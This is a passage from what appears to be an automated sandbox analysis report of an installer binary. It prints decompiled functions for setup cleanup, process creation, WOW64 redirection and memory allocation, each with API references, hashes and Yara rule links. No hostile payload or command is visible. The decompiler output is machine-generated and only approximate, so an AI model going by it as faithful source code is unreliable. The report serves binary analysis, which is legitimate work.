					_t75 = E00405CE8(_t74);
					if( *0x4c1d9c != 0) {
						_t117 =  *0x4c1d9c; // 0x0
						_t75 = E004AF1B4(0, _t117, 0xfa, 0x32); // executed
					}
					if( *0x4c1d94 != 0) {
						_t82 =  *0x4c1d94; // 0x0
						_t75 = RemoveDirectoryW(E004084EC(_t82)); // executed
					}
					if( *0x4ba450 != 0) {
						_t81 =  *0x4ba450; // 0x70264
						_t75 = DestroyWindow(_t81); // executed
					}
					if( *0x4c1d78 != 0) {
						_t76 =  *0x4c1d78; // 0x0
						_t99 =  *0x4c1d7c; // 0x1
						_t116 =  *0x426bb0; // 0x426bb4
						E00408D08(_t76, _t99, _t116);
						_t78 =  *0x4c1d78; // 0x0
						E0040540C(_t78);
						 *0x4c1d78 = 0;
						return 0;
					}
					return _t75;
				}
			}




































                                                                    0x004b60e8
                                                                    0x004b60e8
                                                                    0x004b60e8
                                                                    0x004b60ea
                                                                    0x004b60ec
                                                                    0x004b60ed
                                                                    0x004b610d
                                                                    0x004b6119
                                                                    0x004b613e
                                                                    0x004b614b
                                                                    0x004b6150
                                                                    0x004b6156
                                                                    0x004b615c
                                                                    0x004b615f
                                                                    0x004b6169
                                                                    0x004b6181
                                                                    0x004b6183
                                                                    0x004b618d
                                                                    0x004b618d
                                                                    0x004b6181
                                                                    0x004b6192
                                                                    0x004b619a
                                                                    0x004b61a7
                                                                    0x004b61af
                                                                    0x004b61b4
                                                                    0x004b61c4
                                                                    0x004b61cc
                                                                    0x004b61d0
                                                                    0x004b61d5
                                                                    0x004b61e2
                                                                    0x004b61e3
                                                                    0x004b61ed
                                                                    0x004b61f3
                                                                    0x004b61f8
                                                                    0x004b61fd
                                                                    0x004b6200
                                                                    0x004b6205
                                                                    0x004b620c
                                                                    0x004b620d
                                                                    0x004b6212
                                                                    0x004b6215
                                                                    0x004b621a
                                                                    0x004b6232
                                                                    0x004b6237
                                                                    0x004b623e
                                                                    0x004b623f
                                                                    0x004b6244
                                                                    0x004b6247
                                                                    0x004b624a
                                                                    0x004b624f
                                                                    0x004b6257
                                                                    0x004b625c
                                                                    0x004b6261
                                                                    0x004b6264
                                                                    0x004b626e
                                                                    0x004b6275
                                                                    0x004b6276
                                                                    0x004b627b
                                                                    0x004b627e
                                                                    0x004b6281
                                                                    0x004b6287
                                                                    0x004b6294
                                                                    0x004b6299
                                                                    0x004b62a0
                                                                    0x004b62a1
                                                                    0x004b62a6
                                                                    0x004b62a9
                                                                    0x004b62ac
                                                                    0x004b62b1
                                                                    0x004b62b6
                                                                    0x004b62bb
                                                                    0x004b62c2
                                                                    0x004b62c5
                                                                    0x004b62c8
                                                                    0x004b62cd
                                                                    0x004b62d7
                                                                    0x004b611b
                                                                    0x004b611b
                                                                    0x004b6120
                                                                    0x004b6126
                                                                    0x004b612d
                                                                    0x004b64b5
                                                                    0x004b64b8
                                                                    0x004b64bb
                                                                    0x004b64c0
                                                                    0x004b64c5
                                                                    0x004b64d1
                                                                    0x004b64df
                                                                    0x004b64e7
                                                                    0x004b64e7
                                                                    0x004b64f3
                                                                    0x004b64f5
                                                                    0x004b6500
                                                                    0x004b6500
                                                                    0x004b650c
                                                                    0x004b650e
                                                                    0x004b6514
                                                                    0x004b6514
                                                                    0x004b6520
                                                                    0x004b6522
                                                                    0x004b6527
                                                                    0x004b652d
                                                                    0x004b6533
                                                                    0x004b6538
                                                                    0x004b653d
                                                                    0x004b6544
                                                                    0x00000000
                                                                    0x004b6544
                                                                    0x004b6549
                                                                    0x004b6549

                                                                    APIs
                                                                    • MessageBoxW.USER32(00000000,00000000,00000000,00000024), ref: 004B6179
                                                                      • Part of subcall function 004AFA44: MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
                                                                    • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                                    • DestroyWindow.USER32(00070264,004B6554), ref: 004B6514
                                                                      • Part of subcall function 004AF1B4: Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                                      • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                                      • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLastMessage$DestroyDirectoryRemoveSleepWindow
                                                                    • String ID: .tmp$0MB$|gO
                                                                    • API String ID: 3858953238-3931795636
                                                                    • Opcode ID: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                                    • Instruction ID: b159488041d1577a8b45ed1a1d18f26c00613076fc9a683522f38ff229f2206a
                                                                    • Opcode Fuzzy Hash: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                                    • Instruction Fuzzy Hash: AC615A342002009FD755EF69ED86EAA37A5EB4A308F51453AF801976B2DA3CBC51CB6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004AF728, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77processCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 61%
                                                                    			E004AF728(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				struct _STARTUPINFOW _v76;
				void* _v88;
				void* _v92;
				int _t23;
				intOrPtr _t49;
				DWORD* _t51;
				void* _t56;

				_v8 = 0;
				_t51 = __ecx;
				_t53 = __edx;
				_t41 = __eax;
				_push(_t56);
				_push(0x4af7ff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xffffffa8;
				_push(0x4af81c);
				_push(__eax);
				_push(0x4af82c);
				_push(__edx);
				E004087C4( &_v8, __eax, 4, __ecx, __edx);
				E00405884( &_v76, 0x44);
				_v76.cb = 0x44;
				_t23 = CreateProcessW(0, E004084EC(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92); // executed
				_t58 = _t23;
				if(_t23 == 0) {
					E004AF34C(0x83, _t41, 0, _t53, _t58);
				}
				CloseHandle(_v88);
				do {
					E004AF6FC();
				} while (MsgWaitForMultipleObjects(1,  &_v92, 0, 0xffffffff, 0x4ff) == 1);
				E004AF6FC();
				GetExitCodeProcess(_v92, _t51); // executed
				CloseHandle(_v92);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(0x4af806);
				return E00407A20( &_v8);
			}











                                                                    0x004af733
                                                                    0x004af736
                                                                    0x004af738
                                                                    0x004af73a
                                                                    0x004af73e
                                                                    0x004af73f
                                                                    0x004af744
                                                                    0x004af747
                                                                    0x004af74a
                                                                    0x004af74f
                                                                    0x004af750
                                                                    0x004af755
                                                                    0x004af75e
                                                                    0x004af76d
                                                                    0x004af772
                                                                    0x004af798
                                                                    0x004af79d
                                                                    0x004af79f
                                                                    0x004af7a5
                                                                    0x004af7a5
                                                                    0x004af7ae
                                                                    0x004af7b3
                                                                    0x004af7b3
                                                                    0x004af7cc
                                                                    0x004af7d1
                                                                    0x004af7db
                                                                    0x004af7e4
                                                                    0x004af7eb
                                                                    0x004af7ee
                                                                    0x004af7f1
                                                                    0x004af7fe

                                                                    APIs
                                                                    • CreateProcessW.KERNEL32 ref: 004AF798
                                                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
                                                                    • MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
                                                                    • GetExitCodeProcess.KERNEL32 ref: 004AF7DB
                                                                    • CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
                                                                      • Part of subcall function 004AF34C: GetLastError.KERNEL32(00000000,004AF3F5,?,?,00000000), ref: 004AF36F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                    • String ID: D
                                                                    • API String ID: 3356880605-2746444292
                                                                    • Opcode ID: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
                                                                    • Instruction ID: 88989adc3f1fa39a5a5eb6990527994e2deb527bcdcae90bffb7d35c0d41af56
                                                                    • Opcode Fuzzy Hash: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
                                                                    • Instruction Fuzzy Hash: C01163716041096EEB00FBE68C42F9F77ACDF56714F50053AB604E72C5DA789905866D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004B5A90, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 60%
                                                                    			E004B5A90(void* __ebx, void* __ecx, void* __edx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _t16;
				intOrPtr _t32;
				intOrPtr _t41;

				_t27 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(_t41);
				_push(0x4b5b5a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				 *0x4c1124 =  *0x4c1124 - 1;
				if( *0x4c1124 < 0) {
					 *0x4c1128 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64DisableWow64FsRedirection");
					 *0x4c112c = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64RevertWow64FsRedirection");
					if( *0x4c1128 == 0 ||  *0x4c112c == 0) {
						_t16 = 0;
					} else {
						_t16 = 1;
					}
					 *0x4c1130 = _t16;
					E00422D44( &_v12);
					E00422660(_v12,  &_v8);
					E004086E4( &_v8, L"shell32.dll");
					E00421230(_v8, _t27, 0x8000); // executed
					E004232EC(0x4c783afb,  &_v16);
				}
				_pop(_t32);
				 *[fs:eax] = _t32;
				_push(0x4b5b61);
				return E00407A80( &_v16, 3);
			}









                                                                    0x004b5a90
                                                                    0x004b5a93
                                                                    0x004b5a95
                                                                    0x004b5a97
                                                                    0x004b5a9b
                                                                    0x004b5a9c
                                                                    0x004b5aa1
                                                                    0x004b5aa4
                                                                    0x004b5aa7
                                                                    0x004b5aae
                                                                    0x004b5ac9
                                                                    0x004b5ae3
                                                                    0x004b5aef
                                                                    0x004b5afa
                                                                    0x004b5afe
                                                                    0x004b5afe
                                                                    0x004b5afe
                                                                    0x004b5b00
                                                                    0x004b5b08
                                                                    0x004b5b13
                                                                    0x004b5b20
                                                                    0x004b5b2d
                                                                    0x004b5b3a
                                                                    0x004b5b3a
                                                                    0x004b5b41
                                                                    0x004b5b44
                                                                    0x004b5b47
                                                                    0x004b5b59

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5ABE
                                                                      • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5AD8
                                                                      • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00000000), ref: 0040E20B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                    • API String ID: 1646373207-2130885113
                                                                    • Opcode ID: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
                                                                    • Instruction ID: b56c6da1e02aeac4ac36a9fb763b3b3a2bfa4c382daca5c5ea2a5d16c2919690
                                                                    • Opcode Fuzzy Hash: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
                                                                    • Instruction Fuzzy Hash: DA11A730604704AFD744EB76DC02F9DB7B4E749704F64447BF500A6591CABC6A04CA3D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403EE8, Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 68%
                                                                    			E00403EE8(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* _t96;
				void** _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				void* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				void* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t95 = __eax;
				_t129 =  *0x4bb059; // 0x0
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t2 = _t162 + 0x10010; // 0x10110
							_t156 = _t2 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
							_t121 = _t96;
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E00403C48();
								_t99 =  *0x4bdb80; // 0x4bdb7c
								 *_t147 = 0x4bdb7c;
								 *0x4bdb80 = _t121;
								 *(_t147 + 4) = _t99;
								 *_t99 = _t121;
								 *0x4bdb78 = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t67 = _t95 + 0xd3; // 0x1d3
						_t125 = (_t67 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x4bbae8], ah");
								if(__eflags == 0) {
									goto L42;
								}
								asm("pause");
								__eflags =  *0x4bb989;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L42;
							}
						}
						L42:
						_t68 = _t125 - 0xb30; // -2445
						_t141 = _t68;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x4bbaf8 + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x4bbaf4;
							if((0xfffffffe << _t132 &  *0x4bbaf4) == 0) {
								_t133 =  *0x4bbaf0; // 0x0
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E00403BCC(_t125);
								} else {
									_t110 =  *0x4bbaec; // 0x22268a0
									_t109 = _t110 - _t125;
									 *0x4bbaec = _t109;
									 *0x4bbaf0 = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x4bbae8 = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L50;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L50:
							_push(_t152);
							_push(_t145);
							_t148 = 0x4bbb78 + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x4bbaf8 + _t142 * 4;
								 *_t80 =  *(0x4bbaf8 + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x4bbaf4], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E00403B00(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							_t93 = _t125 + 2; // 0x1a5
							 *(_t159 - 4) = _t93;
							 *0x4bbae8 = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					_t6 = __edx + 0x4bb990; // 0xc8c8c8c8
					__eax =  *_t6 & 0x000000ff;
					__ebx = 0x4b7080 + ( *_t6 & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									asm("pause");
									__eflags =  *0x4bb989;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [ebx], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 8);
					__eax =  *(__edx + 0x10);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x18);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0x14);
						if(__eax >  *(__ebx + 0x14)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x4bb059;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags == 0) {
										goto L22;
									}
									asm("pause");
									__eflags =  *0x4bb989;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [0x4bbae8], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
									goto L22;
								}
							}
							L22:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x4bbaf4;
							__eflags =  *(__ebx + 1) &  *0x4bbaf4;
							if(( *(__ebx + 1) &  *0x4bbaf4) == 0) {
								__ecx =  *(__ebx + 4) & 0x0000ffff;
								__edi =  *0x4bbaf0; // 0x0
								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
									__eax =  *(__ebx + 6) & 0x0000ffff;
									__edi = __eax;
									__eax = E00403BCC(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L35;
									} else {
										 *0x4bbae8 = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x4bbaec; // 0x22268a0
									__ecx =  *(__ebx + 6) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x4bbaf0 =  *0x4bbaf0 - __edi;
									 *0x4bbaec = __esi;
									goto L35;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x4bbaf8 + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4;
								__edi = 0x4bbb78 + ( *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x4bbaf8 + __eax * 4;
									 *_t38 =  *(0x4bbaf8 + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
									if( *_t38 == 0) {
										asm("btr [0x4bbaf4], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 6) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E00403B00(__eax, __ecx, __edx);
								}
								L35:
								_t56 = __edi + 6; // 0x6
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x4bbae8 = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 0x10)) = 0;
								 *((intOrPtr*)(__esi + 0x14)) = 1;
								 *(__ebx + 0x18) = __esi;
								_t61 = __esi + 0x20; // 0x22268c0
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 0x10) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0x14) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0x14;
							 *_t19 =  *(__edx + 0x14) + 1;
							__eflags =  *_t19;
							 *(__ebx + 0x10) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 0x10) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 8);
							 *(__ecx + 0xc) = __ebx;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}






























                                                                    0x00403ee8
                                                                    0x00403ef4
                                                                    0x00403efa
                                                                    0x00404148
                                                                    0x0040414d
                                                                    0x00404260
                                                                    0x00404261
                                                                    0x00404263
                                                                    0x00403c94
                                                                    0x00403c98
                                                                    0x00403c9a
                                                                    0x00403ca4
                                                                    0x00403cb4
                                                                    0x00403cb9
                                                                    0x00403cbd
                                                                    0x00403cbf
                                                                    0x00403cc1
                                                                    0x00403cc7
                                                                    0x00403cca
                                                                    0x00403ccf
                                                                    0x00403cd4
                                                                    0x00403cda
                                                                    0x00403ce0
                                                                    0x00403ce3
                                                                    0x00403ce5
                                                                    0x00403cec
                                                                    0x00403cec
                                                                    0x00403cf5
                                                                    0x00404269
                                                                    0x00404269
                                                                    0x0040426b
                                                                    0x0040426b
                                                                    0x00404153
                                                                    0x00404153
                                                                    0x0040415f
                                                                    0x00404162
                                                                    0x00404164
                                                                    0x0040410c
                                                                    0x00404111
                                                                    0x00404119
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040411b
                                                                    0x0040411d
                                                                    0x00404124
                                                                    0x00000000
                                                                    0x00404126
                                                                    0x00404128
                                                                    0x00404132
                                                                    0x0040413a
                                                                    0x0040413e
                                                                    0x00000000
                                                                    0x0040413e
                                                                    0x0040413a
                                                                    0x00000000
                                                                    0x00404124
                                                                    0x0040410c
                                                                    0x00404166
                                                                    0x00404166
                                                                    0x00404166
                                                                    0x0040416e
                                                                    0x00404171
                                                                    0x0040417b
                                                                    0x0040417b
                                                                    0x00404182
                                                                    0x00404195
                                                                    0x00404199
                                                                    0x0040419f
                                                                    0x004041b8
                                                                    0x004041be
                                                                    0x004041be
                                                                    0x004041c0
                                                                    0x004041de
                                                                    0x004041c2
                                                                    0x004041c2
                                                                    0x004041c7
                                                                    0x004041c9
                                                                    0x004041ce
                                                                    0x004041d7
                                                                    0x004041d7
                                                                    0x004041e3
                                                                    0x004041eb
                                                                    0x004041a1
                                                                    0x004041a1
                                                                    0x004041ab
                                                                    0x004041b3
                                                                    0x00000000
                                                                    0x004041b3
                                                                    0x00404184
                                                                    0x00404187
                                                                    0x0040418a
                                                                    0x004041ec
                                                                    0x004041ec
                                                                    0x004041ed
                                                                    0x004041ee
                                                                    0x004041f5
                                                                    0x004041f8
                                                                    0x004041fb
                                                                    0x004041fe
                                                                    0x00404200
                                                                    0x00404202
                                                                    0x00404209
                                                                    0x0040420b
                                                                    0x0040420b
                                                                    0x0040420b
                                                                    0x00404212
                                                                    0x00404214
                                                                    0x00404214
                                                                    0x00404212
                                                                    0x00404220
                                                                    0x00404225
                                                                    0x00404225
                                                                    0x00404227
                                                                    0x00404248
                                                                    0x00404248
                                                                    0x00404248
                                                                    0x00404229
                                                                    0x00404229
                                                                    0x0040422f
                                                                    0x00404232
                                                                    0x00404236
                                                                    0x0040423c
                                                                    0x0040423e
                                                                    0x0040423e
                                                                    0x0040423c
                                                                    0x0040424d
                                                                    0x00404250
                                                                    0x00404253
                                                                    0x0040425f
                                                                    0x0040425f
                                                                    0x00404182
                                                                    0x00403f00
                                                                    0x00403f00
                                                                    0x00403f02
                                                                    0x00403f02
                                                                    0x00403f09
                                                                    0x00403f10
                                                                    0x00403f68
                                                                    0x00403f68
                                                                    0x00403f6d
                                                                    0x00403f71
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403f73
                                                                    0x00403f73
                                                                    0x00403f76
                                                                    0x00403f7b
                                                                    0x00403f7f
                                                                    0x00403f81
                                                                    0x00403f81
                                                                    0x00403f84
                                                                    0x00403f89
                                                                    0x00403f8d
                                                                    0x00403f8f
                                                                    0x00403f92
                                                                    0x00403f94
                                                                    0x00403f9b
                                                                    0x00000000
                                                                    0x00403f9d
                                                                    0x00403f9f
                                                                    0x00403fa4
                                                                    0x00403fa9
                                                                    0x00403fad
                                                                    0x00403fb5
                                                                    0x00000000
                                                                    0x00403fb5
                                                                    0x00403fad
                                                                    0x00403f9b
                                                                    0x00403f8d
                                                                    0x00000000
                                                                    0x00403f7f
                                                                    0x00403f68
                                                                    0x00403f12
                                                                    0x00403f12
                                                                    0x00403f15
                                                                    0x00403f18
                                                                    0x00403f1d
                                                                    0x00403f1f
                                                                    0x00403f38
                                                                    0x00403f3b
                                                                    0x00403f3f
                                                                    0x00403f41
                                                                    0x00403f44
                                                                    0x00403fbc
                                                                    0x00403fbd
                                                                    0x00403fbe
                                                                    0x00403fc5
                                                                    0x00403fc7
                                                                    0x00403fc7
                                                                    0x00403fcc
                                                                    0x00403fd4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403fd6
                                                                    0x00403fd8
                                                                    0x00403fdf
                                                                    0x00000000
                                                                    0x00403fe1
                                                                    0x00403fe3
                                                                    0x00403fe8
                                                                    0x00403fed
                                                                    0x00403ff5
                                                                    0x00403ff9
                                                                    0x00000000
                                                                    0x00403ff9
                                                                    0x00403ff5
